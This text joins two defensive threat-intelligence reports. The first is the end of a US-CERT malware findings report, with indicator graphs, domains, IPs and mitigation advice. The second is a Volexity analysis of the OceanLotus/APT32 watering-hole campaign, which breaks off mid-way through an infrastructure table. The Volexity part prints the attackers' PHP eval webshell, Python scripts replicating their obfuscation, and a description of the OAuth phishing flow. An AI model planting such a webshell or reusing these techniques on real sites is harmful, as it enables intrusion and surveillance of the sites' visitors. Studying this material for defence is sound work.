expire: 604800
minimum ttl: 86400
3600s
(01:00:00)
waterfilter.in.ua
IN A
176.114.0.120 3600s
(01:00:00)
waterfilter.in.ua
IN NS ns1.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN NS ns2.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN TXT v=spf1 ip4:176.114.0.120 a mx ~all3600s
(01:00:00)
waterfilter.in.ua
IN MX
preference:
exchange:
mail.waterfilter.in.ua
3600s
(01:00:00)
waterfilter.in.ua
IN MX
preference:
exchange:
mail.waterfilter.in.ua
3600s
(01:00:00)
157.0.114.176.in-addr.arpa IN PTR waterfilter.in.ua
3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2014044197
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 86400
3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s
(01:00:00)
-- end -Relationships
(I) 176.114.0.157
Characterized_By
(W) Address lookup
(I) 176.114.0.157
Related_To
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Relationship Summary
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
US-CERT MIFR-10105049-Update2
Related_To
(S) Interface for PAS v.3.1.0
58 of 63
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
da9f2804b16b369156e1b629ad3d2aac79326b94
284e43c7b8355f3db71912b8 (bfcb5)
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
20f76ada1721b61963fa595e3a2006c962253513
62b79d5d719197c190cd4239 (c3e23)
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
7b28b9b85f9943342787bae1c92cab39c01f9d82b
99eb8628abc638afd9eddaf (38f71)
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
ae67c121c7b81638a7cb655864d574f8a9e55e66
bcb9a7b01f0719a05fab7975 (eddfe)
(S) Interface for PAS v.3.1.0
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
da9f2804b16b369156e1b629ad3d2aac79326b94
284e43c7b8355f3db71912b8 (bfcb5)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
20f76ada1721b61963fa595e3a2006c962253513
62b79d5d719197c190cd4239 (c3e23)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
7b28b9b85f9943342787bae1c92cab39c01f9d82b
99eb8628abc638afd9eddaf (38f71)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
ae67c121c7b81638a7cb655864d574f8a9e55e66
bcb9a7b01f0719a05fab7975 (eddfe)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
Related_To
(S) Interface for PAS v.3.0.10
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
Related_To
d285115e97c02063836f1cf8f91669c114052727c3
9bf4bd3c062ad5b3509e38 (fc45a)
(S) Interface for PAS v.3.0.10
Related_To
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
d285115e97c02063836f1cf8f91669c114052727c3
9bf4bd3c062ad5b3509e38 (fc45a)
Related_To
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
55058d3427ce932d8efcbe54dccf97c9a8d1e85c7
67814e34f4b2b6a6b305641 (8f154)
Connected_To
(D) private.directinvesting.com
(D) private.directinvesting.com
Characterized_By
(W) Address lookup
(D) private.directinvesting.com
Connected_From
55058d3427ce932d8efcbe54dccf97c9a8d1e85c7
67814e34f4b2b6a6b305641 (8f154)
(D) private.directinvesting.com
Related_To
(H) GET /lexicon/index.c
(D) private.directinvesting.com
Related_To
(H) GET /lexicon/index.c
(D) private.directinvesting.com
Related_To
(H) GET /lexicon/index.c
(D) private.directinvesting.com
Related_To
(I) 204.12.12.40
(I) 204.12.12.40
Characterized_By
(W) Address lookup
(I) 204.12.12.40
Related_To
(D) private.directinvesting.com
9acba7e5f972cdd722541a23ff314ea81ac35d5c0
c758eb708fb6e2cc4f598a0 (ae7e3)
Connected_To
(D) cderlearn.com
9acba7e5f972cdd722541a23ff314ea81ac35d5c0
c758eb708fb6e2cc4f598a0 (ae7e3)
Characterized_By
(S) digital_cert_steal.bmp
(D) cderlearn.com
Characterized_By
(W) Address lookup
(D) cderlearn.com
Connected_From
9acba7e5f972cdd722541a23ff314ea81ac35d5c0
c758eb708fb6e2cc4f598a0 (ae7e3)
(D) cderlearn.com
Related_To
(H) POST /search.cfm HTT
US-CERT MIFR-10105049-Update2
59 of 63
(D) cderlearn.com
Related_To
(H) POST /search.cfm HTT
(D) cderlearn.com
Related_To
(I) 209.236.67.159
(I) 209.236.67.159
Characterized_By
(W) Address lookup
(I) 209.236.67.159
Related_To
(D) cderlearn.com
(S) digital_cert_steal.bmp
Characterizes
9acba7e5f972cdd722541a23ff314ea81ac35d5c0
c758eb708fb6e2cc4f598a0 (ae7e3)
(W) Address lookup
Characterizes
(D) private.directinvesting.com
(W) Address lookup
Characterizes
(D) cderlearn.com
(W) Address lookup
Characterizes
(D) editprod.waterfilter.in.ua
(W) Address lookup
Characterizes
(D) insta.reduct.ru
(W) Address lookup
Characterizes
(D) one2shoppee.com
(W) Address lookup
Characterizes
(D) ritsoperrol.ru
(W) Address lookup
Characterizes
(D) littjohnwilhap.ru
(W) Address lookup
Characterizes
(D) wilcarobbe.com
(H) GET /lexicon/index.c
Related_To
(D) private.directinvesting.com
(H) GET /lexicon/index.c
Related_To
(D) private.directinvesting.com
(H) GET /lexicon/index.c
Related_To
(D) private.directinvesting.com
(H) POST /search.cfm HTT
Related_To
(D) cderlearn.com
(H) POST /search.cfm HTT
Related_To
(D) cderlearn.com
(H) POST /zapoy/gate.php
Related_To
(D) wilcarobbe.com
(H) POST /zapoy/gate.php
Related_To
(D) littjohnwilhap.ru
(P) 80
Related_To
(D) wilcarobbe.com
(P) 80
Related_To
(D) littjohnwilhap.ru
(P) 80
Related_To
(D) ritsoperrol.ru
(H) POST /zapoy/gate.php
Related_To
(D) ritsoperrol.ru
(P) 80
Related_To
(D) one2shoppee.com
(P) 80
Related_To
(D) insta.reduct.ru
(P) 80
Related_To
(D) editprod.waterfilter.in.ua
(W) Address lookup
Characterizes
(I) 146.185.161.126
(W) Address lookup
Characterizes
(I) 176.114.0.120
(W) Address lookup
Characterizes
(I) 209.236.67.159
(W) Address lookup
Characterizes
(I) 204.12.12.40
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e (81f1a)
Dropped
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e (81f1a)
Characterized_By
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e
Characterizes
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e (81f1a)
(P) 80
Related_To
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
(W) Address lookup
Characterizes
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
(W) Address lookup
Characterizes
(I) 176.114.0.157
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Characterized_By
(S) searching_reg_pop3.bmp
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) editprod.waterfilter.in.ua
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) insta.reduct.ru
US-CERT MIFR-10105049-Update2
60 of 63
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) one2shoppee.com
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) ritsoperrol.ru
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) littjohnwilhap.ru
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) wilcarobbe.com
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Connected_To
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
Dropped_By
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e (81f1a)
(S) searching_reg_pop3.bmp
Characterizes
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) wilcarobbe.com
Characterized_By
(W) Address lookup
(D) wilcarobbe.com
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) wilcarobbe.com
Related_To
(H) POST /zapoy/gate.php
(D) wilcarobbe.com
Related_To
(P) 80
(D) one2shoppee.com
Characterized_By
(W) Address lookup
(D) one2shoppee.com
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) one2shoppee.com
Related_To
(P) 80
(D) ritsoperrol.ru
Characterized_By
(W) Address lookup
(D) ritsoperrol.ru
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) ritsoperrol.ru
Related_To
(P) 80
(D) ritsoperrol.ru
Related_To
(H) POST /zapoy/gate.php
(D) littjohnwilhap.ru
Characterized_By
(W) Address lookup
(D) littjohnwilhap.ru
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) littjohnwilhap.ru
Related_To
(H) POST /zapoy/gate.php
(D) littjohnwilhap.ru
Related_To
(P) 80
(D) insta.reduct.ru
Characterized_By
(W) Address lookup
(D) insta.reduct.ru
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) insta.reduct.ru
Related_To
(P) 80
(D) insta.reduct.ru
Related_To
(I) 146.185.161.126
(I) 146.185.161.126
Characterized_By
(W) Address lookup
(I) 146.185.161.126
Related_To
(D) insta.reduct.ru
(D) editprod.waterfilter.in.ua
Characterized_By
(W) Address lookup
(D) editprod.waterfilter.in.ua
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) editprod.waterfilter.in.ua
Related_To
(P) 80
(D) editprod.waterfilter.in.ua
Related_To
(I) 176.114.0.120
(I) 176.114.0.120
Characterized_By
(W) Address lookup
(I) 176.114.0.120
Related_To
(D) editprod.waterfilter.in.ua
US-CERT MIFR-10105049-Update2
61 of 63
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Related_To
(P) 80
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Characterized_By
(W) Address lookup
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Related_To
(I) 176.114.0.157
(I) 176.114.0.157
Characterized_By
(W) Address lookup
(I) 176.114.0.157
Related_To
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Mitigation Recommendations
US-CERT recommends monitoring activity to the following domain(s) and/or IP(s) as a potential indicator of infection:
private.directinvesting.com
cderlearn.com
204.12.12.40
209.236.67.159
176.114.0.120
editprod.waterfilter.in.ua
insta.reduct.ru
146.185.161.126
one2shoppee.com
ritsoperrol.ru
littjohnwilhap.ru
wilcarobbe.com
mymodule.waterfilter.in.ua/system/logs/xtool.exe
176.114.0.157
US-CERT would like to remind users and administrators of the following best practices to strengthen the security posture of their
organization's systems:
Maintain up-to-date antivirus signatures and engines.
Restrict users' ability (permissions) to install and run unwanted software applications.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Keep operating system patches up-to-date.
Enable a personal firewall on agency workstations.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the
file header).
Monitor users' web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumbdrives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats; implement appropriate ACLs.
Contact Information
1-888-282-0870
soc@us-cert.gov (UNCLASS)
us-cert@dhs.sgov.gov (SIPRNET)
us-cert@dhs.ic.gov (JWICS)
US-CERT continuously strives to improve its products and services. You can help by answering a very short series of questions about this
product at the following URL: https://forms.us-cert.gov/ncsd-feedback/
Document FAQ
What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In
most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact
US-CERT and provide information regarding the level of desired analysis.
Can I distribute this to other people? This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when
information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.
US-CERT MIFR-10105049-Update2
62 of 63
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document
should be directed to the US-CERT Security Operations Center at 1-888-282-0870 or soc@us-cert.gov.
Can I submit malware to US-CERT? US-CERT encourages you to report any suspicious activity, including cybersecurity incidents, poss ble
malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at www.uscert.gov. Malware samples can be submitted via https://malware.us-cert.gov. Alternative submission methods are available by special
request.
US-CERT MIFR-10105049-Update2
63 of 63
OceanLotus Blossoms: Mass Digital Surveillance and
Attacks Targeting ASEAN, Asian Nations, the Media, Human
Rights Groups, and Civil Society
www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-themedia-human-rights-and-civil-society/
November 6, 2017
by Dave Lassalle, Sean Koessel, Steven Adair
In May 2017, Volexity identified and started tracking a very sophisticated and extremely
widespread mass digital surveillance and attack campaign targeting several Asian nations, the
ASEAN organization, and hundreds of individuals and organizations tied to media, human rights
and civil society causes. These attacks are being conducted through numerous strategically
compromised websites and have occurred over several high-profile ASEAN summits. Volexity has
tied this attack campaign to an advanced persistent threat (APT) group first identified as
OceanLotus by SkyEye Labs in 2015. OceanLotus, also known as APT32, is believed to be a
Vietnam-based APT group that has become increasingly sophisticated in its attack tactics,
techniques, and procedures (TTPs). Volexity works closely with several human rights and civil
society organizations. A few of these organizations have specifically been targeted by
OceanLotus since early 2015. As a result, Volexity has been able to directly observe and
investigate various attack campaigns. This report is based on a very targeted attack that Volexity
observed and the research that followed.
1/20
Key highlights of this most recent and ongoing attack campaign by the OceanLotus group are as
follows:
Massive digital profiling and information collection campaign via strategically compromised
websites
Over 100 websites of individuals and organizations tied to Government, Military, Human
Rights, Civil Society, Media, State Oil Exploration, and more used to launch attacks around
the globe
Use of whitelists to target only specific individuals and organizations
Custom Google Apps designed for gaining access to victim Gmail accounts to steal e-mail
and contacts
Strategic and targeted JavaScript delivery to modify the view of compromised websites to
facilitate social engineering of visitors to install malware or provide access to e-mail
accounts
Large distributed attack infrastructure spanning numerous hosting providers and countries
Numerous attacker created domains designed to mimic legitimate online services and
organizations such as AddThis, Disqus, Akamai, Baidu, Cloudflare, Facebook, Google, and
others
Heavy uses of Let
s Encrypt SSL/TLS certificates
Use of multiple backdoors, such as Cobalt Strike and others, believed to be developed and
solely used by OceanLotus
Volexity believes the size and scale of this attack campaign have only previously been rivaled by
a Russian APT group commonly referred to as Turla and documented in a report from Symantec
called The Waterbug attack group. The OceanLotus threat group has successfully operated,
largely unnoticed, through several high-profile websites since late 2016. Volexity has observed
the following operating pattern for the OceanLotus group:
Compromise website of strategic importance (e.g. websites visitors have a higher likelihood
to be targets of interest)
Add one or more webshell backdoors to victim websites to maintain persistence
Webshell used to add JavaScript developed by OceanLotus into the website
The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains
to typically load one of two different OceanLotus frameworks
OceanLotus JavaScript frameworks designed to track, profile, and target the compromised
website
s visitors
Website visitors of interest are flagged for targeting and receive special JavaScript aimed at
compromising the user
s system or e-mail accounts
Volexity has also noted that some of the organizations with compromised websites have also
been targeted with spear phishing campaigns that attempt to install backdoors on the target
systems. Spear phishing activity and detailed malware infrastructure will be described in a follow
on report on OceanLotus activity.
Compromised Sites
2/20
Volexity has been able to identify a staggeringly large number of websites that have been
strategically compromised by the OceanLotus attackers. The number of compromised websites
exceeds 100. The overwhelming majority of the websites that have been compromised belong to
Vietnamese individuals and organizations that are critical of the Vietnamese Government. The
remainder of the compromised websites are tied to one of three countries that share a land
border with Vietnam or the Philippines. Unlike with the Vietnamese victims, in most cases these
websites are tied to state owned or affiliated organizations.
Vietnam
Volexity has chosen not to list the Vietnamese websites that have been compromised, as the
quantity is exceedingly large (over 80) and many of them are tied to individuals or very small
organizations. However, the list below characterizes the types of websites that have been
victimized to facilitate this ongoing campaign.
Human Rights
Civil Society
News/Media (English and Vietnamese Language)
Individual Bloggers
Religion
ASEAN
Organization
Website
Compromised Page
Association of Southeast Asian
Nations (ASEAN)
asean.org
/modules/aseanmail/js/wp-mailinglist.js
/modules/wordpresspopup/inc/external/wpmu-lib/js/wpmuui.3.min.js
ASEAN Trade Repository
atr.asean.org
Main Index
ASEAN Investment
investasean.asean.org
Main Index
Organization
Website
Compromised Page
Ministry of Foreign Affairs
www.mfa.gov.kh
/jwplayer.js
Ministry of Environment
www.moe.gov.kh
/other/js/jquery/jquery.js
Ministry of Civil Service
www.mcs.gov.kh
Main Index
National Police
www.police.gov.kh
/wp-includes/js/jquery/jquery.js?ver=1.12.4
Ministry of National AssemblySenate Relations and Inspection
www.monasri.gov.kh
wtemplates/monasri_template/js/menu/mega.js
Ministry of Social Affairs, Veterans,
and Youth Rehabilitation
www.mosvy.gov.kh
/public/js/default.js
National Election Committee
www.necelect.org.kh
Main Index
Cambodia
3/20
China
Organization
Website
Compromised Page
BDStar Information Service Co.
bdstarlbs.com
Main Index
BDStar Navigation Co.
www.navchina.com
Main Index
China National United Oil Corporation
www.chinaoil.com.cn
/chinaoil/xhtml/js/jquery-1.7.2.min.js
China Oilfield Services Limited
Withheld
Withheld
China National Offshore Oil Corporation
Withheld
Withheld
Laos
Organization
Website
Compromised Page
Bokeo Province
bokeo.gov.la
Main Index
Ministry of Public Works and Transport
www.mpwt.gov.la
/media/system/js/mootools-core.js
Philippines
Organization
Website
Compromised Page
Armed Forces of the Philippines
www.afp.mil.ph
/modules/mod_js_flexslider/assets/js/jquery.easing.js
Office of the President
op-proper.gov.ph
Main Index
JavaScript Tracking, Profiling, and Delivery Frameworks
The compromised websites are being leveraged to deliver malicious JavaScript designed to
profile and fingerprint a user on each visit. Volexity found that OceanLotus had developed two
different JavaScript frameworks to accomplish their profiling and targeting activities. For the
purposes of this blog, we will call them Framework A and Framework B. With few exceptions,
the compromised websites would only have code loading either Framework A or Framework B.
Each of the hostnames and IPs were also tied to one of the two frameworks, with none of them
serving up both. The following sections will provide some detail on the two frameworks and their
multiple scripting components.
Framework A
Framework A is found on a limited number of victim sites. Initial URLs for access to Framework A
are typically formatted similar to the following:
cloudflare-api[.]com/ajax/libs/jquery/2.1.3/jquery.min.js?s=1&v=72580
Volexity believes the v= value is unique and serves as a victim site identifier, which may not be
necessary given the data the script sends along as detailed below. The above script is retrieved
4/20
following a visit to asean.org. The following code has been appended to legitimate JavaScript
loaded by the ASEAN website:
Framework A, Script 1
Host Tracking
The first script delivered contains several support functions such as an MD5 function, a base64
decoder, and functions for loading additional data. The goal of this script appears to be defining
everything needed to track a host across different requests.
This script defines a section of variables used in other parts of the code. The host based ones are
obtained from the User-Agent in the initial request.
Then it will load a second JavaScript file:
The h1 and h2 values in the request are MD5 hashes of some information about the host making
the request. The first hash, h1, is the MD5 hash of various pieces of information collected from
the browser and concatenated together.
5/20
The second hash, h2, is also an MD5 hash, but the values concatenated are the screen height
and width, timezone, plugins, MIME type, and language information.
The encrypt function simply iterates over the passed string and key string and adds the ASCII
values at each position. Python scripts for encrypting and decrypting are as follows.
Encrypt:
#!/usr/bin/env python
import base64
import sys
b64_data = base64.b64encode(sys.argv[2])
key = sys.argv[1]
enc_data = ""
for i, x in enumerate(b64_data):
k = key[i % len(key) -1]
enc_data += chr(ord(x) + ord(k))
print
print base64.b64encode(enc_data)
print
6/20
Decrypt:
#!/usr/bin/env python
import base64
import sys
key = sys.argv[1]
b64_data = sys.argv[2]
enc_data = base64.b64decode(b64_data)
dec_data = ""
for i, x in enumerate(enc_data):
k = key[i % len(key) -1]
dec_data += chr(ord(x) - ord(k))
print
print base64.b64decode(dec_data)
print
Framework A, Script 2
Profiling
The second script returned starts by defining a browser_hash variable. This is composed of h1
and the first 10 characters of h2, separated by
. This script then sends three GET requests,
each with a d parameter in the query string that contains some encrypted and base64 encoded
data.
One request sends
Browser Plugins.
The info is collected in the following part of the code:
Another request sends
Extended Browser Info.
This info is collected as follows:
The final request sends
WebRTC
info to obtain the host IP address.
7/20
Framework B
Framework B is found on the vast majority of sites. Initial URLs for access to Framework B are
simply references to JavaScript (.js) files on OceanLotus controlled sites. Volexity has found that
the URLs from Framework B do not actually matter, so long as the file extension ends in .js and a
referrer is sent with the request. The JavaScript will be sent back regardless of the file or folder
requested as long as it meets these two criteria.
The main ASEAN website is one of the few places that contain both Framework A and
Framework B.
The following code has also been appended to legitimate JavaScript loaded by the ASEAN
website:
This script will result in the loading of JavaScript from the following URL:
http://ad.jqueryclick[.]com/assets/adv.js
Framework B, Script 1
Host Tracking
The second framework collects similar information, but handles host tracking differently. The initial
script that is delivered varies based on the host OS as determined from the User-Agent in the
request. When the script is loaded, it first makes a GET request to https://health-rayid[.]com/robot.txt. This returns a UUID that is sent in subsequent requests as either zuuid or
client_zuuid.It is also saved in localStorage for the compromised site under a key of x00Sync.
The script then makes two GET requests.
Request 1:
GET /api//adFeedback.js
The base64 data decodes to a JSON string containing information for tracking the host. For
8/20
example, the data below, where zuuid is the UUID returned from health-ray-id.com.
{"uuid":"62d096b35e82547b6a12607c2820f8e0","zuuid":"ca3a8d02-a0f5-4686-9f6bcab4a17a9e2b","hash":""}
The uuid value (also seen as client_uuid in later requests) is also generated by the script and is
stored in a cookie named ___APISID for the compromised domain. It is generated using
the fingerprintjs2 library, which creates a hash based on browser information. This is another
method for tracking users across requests. This library and several other legitimate JavaScript
libraries (including the jQuery core library and others for reading/storing cookies, collecting
timezone data, etc.) are typically downloaded from a CDN URL and saved into localStorage
variables to be later used by the script. They are stored as hex encoded data in a function called
x00Config.
If the client is not on the OceanLotus whitelist, this request just returns a single line of JavaScript
setting a variable named timestamp. However, when the client is on the whitelist, Volexity has
observed a popup window that slowly fades in on top of the legitimate website. In a recent attack,
the popup appeared Google related and would redirect to a Google OAuth page designed to fool
the user into providing access to their account to a malicious Google App. More details on this
appear further down in this post.
Request 2:
GET /sync//adFeedback.js request will just return a timestamp variable.
For a whitelisted system, a new script is delivered. A portion of this script shown below makes a
request to download some additional config data.
11/20
The domain for the request is loaded from the SAPIS_ID cookie which was set by the first script.
Before storing, it is split in two, the two substrings are reversed, then it is base64 encoded. An
example of the SAPIS_ID cookie can be seen in the navigator section above. This ultimately
calls the e.fn_getjson() function that makes a request like the following:
GET /connect.js?
timestamp=59ba12f2eb1e240cd9431624&code=rtp&s1=64c6e32b951adc4f3d5661dba2330141
This returns a JSON config like the following:
These are saved and accessed via a getConfigs() function for different actions the script can
perform.
Ultimately, the script presents a popup over the site saying the content is blocked and requests
12/20
that the visitor sign in to continue. The code below presents this page and tracks progress using
the postShow() and postDown() functions, which send GET requests using the URLs shown
above. When one of the buttons is clicked, the user is redirected to login to the application.
Whitelisted Targeting for Google Account Access
Volexity was able to work with organizations on the OceanLotus whitelist that received special
responses from Framework B. As a result, Volexity was able to directly observe two different
OceanLotus attacks that attempted to fool the targeted user into providing access to their Google
Accounts. OceanLotus attempts to compromise Google Accounts by prompting the user with a
popup directing them to provide OAuth authorizations to a malicious Google App.
Once a user has been flagged for targeting, they will receive a popup when accessing an
OceanLotus compromised website once every 24 hours. This popup slowly fades in over top of
the legitimate website and appears quite legitimate. Screen shots of two different observed
popups are shown below.
Version 1: Locked Content
13/20
Version 2: Chrome Sign In
Regardless of which option the user clicks, they are redirected to Google to initiate OAuth access
to one of OceanLotus
Google Apps. Below is a screen shot of what a user would see prior to
authorizing the the nefarious Google App.
14/20
OceanLotus Google App OAuth
If the targeted user chooses ALLOW, the OceanLotus Google App immediately logs into the
account and starts accessing it. The account has permissions to access all e-mail and contacts,
which is all the access OceanLotus needs to conduct digital surveillance. Volexity strongly
recommends that anyone that thinks they may have been targeted with this campaign or similar
attacks review the Defense Against Ocean Lotus section below.
OceanLotus is also known to be distributing malware in the form of fake Internet Explorer,
Chrome, and Firefox updates. Volexity has observed similar attacks via spear phishing against
targeted organizations that leverage some of the same malware infrastructure. In these cases,
the following Amazon S3 buckets were used to distribute the malware through JavaScript as part
of OceanLotus Framework B or direct links from spear phishing campaigns.
15/20
dload01.s3.amazonaws.com
download-attachments.s3.amazonaws.com
Volexity has observed multiple custom malware families and Cobalt Strike delivered through
these campaigns. Details on the observed malware samples are forthcoming.
Victim Websites Backdoored
Volexity has worked with multiple victim organizations to assist with incident response efforts and
to remedy their compromised systems. This process lead to the identification of different ways the
OceanLotus group gains access to the compromised websites and how they maintain access.
Initial Compromise
Volexity has observed OceanLotus compromising sites one of two ways:
1. Direct user account access to the website
s content management system (CMS)
2. Exploitation of outdated plugins and/or CMS components
It is currently unknown how the intruders gain working credentials to the victim websites. Based
on the TTPs leveraged by OceanLotus, it is possible that credentials could have been socially
engineered (phished) from the victims or that the system administrators have been backdoored
and a keylogger has assisted in capturing the login credentials. Alternatively, it is possible that
some of the credentials were simply guessed. Several of the Vietnamese websites are running
on Google
s Blogspot platform, so it is reasonable to believe that those users
Google accounts
may be compromised. In the case of exploitation, the CMS software used by the victim
organizations was often woefully out of date. Both the core components and added plugins had
remotely exploitable vulnerabilities that lead to compromise.
Persistent Access
In all examined cases, OceanLotus attackers added PHP webshells to the victim websites. In
most cases, the intruders added a new file that was designed to blend in with the web directory in
which it was placed. In some cases, Volexity observed OceanLotus adding PHP code to an
existing legitimate file already on the webserver.
if(@$_POST['']&&@md5(md5($_POST['']))=='')
$x="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";@eval($x($_POST['']));exit();
The hex code storage in $x translates to base64_decode. This code checks to see if variable-1
is set and then validates whether the MD5 of the MD5 of the value set for variable-2 matches an
expected MD5 hash. If these both evaluate as true, the contents of variable-1 are base64
decoded and evaluated on the system. This is a simple webshell that, similar to a China Chopper
shell, allows direct execution on the system under the privileges of the account running the
webserver. The OceanLotus intruders use these shells to interact with the system and update
their JavaScript code on the various websites.
16/20
OceanLotus also appears to have a potentially automated process that periodically checks if the
webshells are still present on the victim systems.
Campaign Infrastructure
Volexity has identified a vast and sprawling amount of infrastructure leveraged by OceanLotus as
a part of this strategic web compromise campaign. There are even more indicators associated
with various malware campaigns that Volexity will detail in another OceanLotus post to follow.
OceanLotus
s attack infrastructure has several unique characteristics, which makes it easy to
identify if a particular system is under their control. As a result, Volexity was able to identify
numerous systems that were not directly observed in active attacks but are strongly believed to
be tied to OceanLotus. In the sections below, the infrastructure has been separated into active
and inactive/unknown categories. If the infrastructure is listed as active, this means that Volexity
has directly observed the hostname
s use in an attack. If the infrastructure is listed as
inactive/unknown, this means that Volexity found evidence the hostname was used in a past
attack but is no longer in use or it has never been observed in a direct attack but has unique
characteristics indicative of OceanLotus infrastructure.
Active
Hostname
IPv4 Address
IPv6 Address
a.doulbeclick.org
45.76.147.201
2001:19f0:4400:48ea:5400:ff:fe71:3201
ad.adthis.org
45.77.39.101
2001:19f0:4400:48fd:5400:ff:fe71:3202
ad.jqueryclick.com
64.62.174.146
api.querycore.com
64.62.174.41
browserextension.jdfkmiabjpfjacifcmihfdjhpnjpiick.com
79.143.87.174
cdn-js.com
128.199.227.80
cdn.adsfly.co
45.32.100.179
2001:19f0:4400:4798:5400:ff:fe71:3200
cdn.disqusapi.com
45.76.179.28
2001:19f0:4400:4989:5400:ff:fe71:3204
cloudflare-api.com
45.32.105.45
cory.ns.webjzcnd.com
139.59.223.191
googlescripts.com
45.114.117.164
health-ray-id.com
138.197.236.215
2604:a880:2:d0::378c:e001
hit.asmung.net
45.32.114.49
jquery.google-script.org
45.32.105.45
js.ecommer.org
45.76.179.151
2001:19f0:4400:48fd:5400:ff:fe71:3202
s.jscore-group.com
64.62.174.17
